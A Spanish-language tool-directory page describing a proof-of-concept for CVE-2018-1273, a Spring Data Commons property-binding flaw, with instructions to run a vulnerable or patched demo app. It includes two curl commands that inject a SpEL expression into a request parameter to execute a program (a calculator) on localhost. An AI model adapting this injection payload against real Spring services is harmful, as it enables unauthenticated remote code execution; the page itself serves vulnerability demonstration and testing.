Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-cve-2018-1273 — Exploit de prueba de concepto para CVE-2018-1273, una vulnerabilidad del enlazador de propiedades de Spring Data Commons que conduce a la ejecución remota de código a través de parámetros de solicitud HTTP manipulados. | Kitploit
Herramientas/GitHubGitHub/webr0ck/poc-cve-2018-1273
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubwebr0ck/poc-cve-2018-1273

poc-cve-2018-1273

Exploit de prueba de concepto para CVE-2018-1273, una vulnerabilidad del enlazador de propiedades de Spring Data Commons que conduce a la ejecución remota de código a través de parámetros de solicitud HTTP manipulados.

Ver Repositorio
23hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-1273

Spring Data Commons, versiones anteriores a 1.13 hasta 1.13.10, 2.0 hasta 2.0.5, y versiones antiguas no soportadas, contienen una vulnerabilidad de enlace de propiedades causada por una neutralización incorrecta de elementos especiales. Un usuario malintencionado remoto no autenticado (o atacante) puede suministrar parámetros de solicitud especialmente manipulados contra recursos HTTP respaldados por Spring Data REST o mediante el enlace de cargas útiles de solicitud basado en proyecciones de Spring Data, lo que puede conducir a un ataque de ejecución remota de código.

Más información aquí

Ejecución

La aplicación puede probarse con la versión vulnerable o con la versión corregida de Spring Data Commons.

  • Versión vulnerable (por defecto):
root@kitploit:~
mvn spring-boot:run
  • Versión corregida:
root@kitploit:~
mvn spring-boot:run -Dfixed

Probando la vulnerabilidad

Ejecute el siguiente comando para comprobar si la vulnerabilidad puede explotarse:

  • En Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • En macOS:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Créditos

Creado por https://www.arima.eu

ARIMA Software Design

Descargar herramienta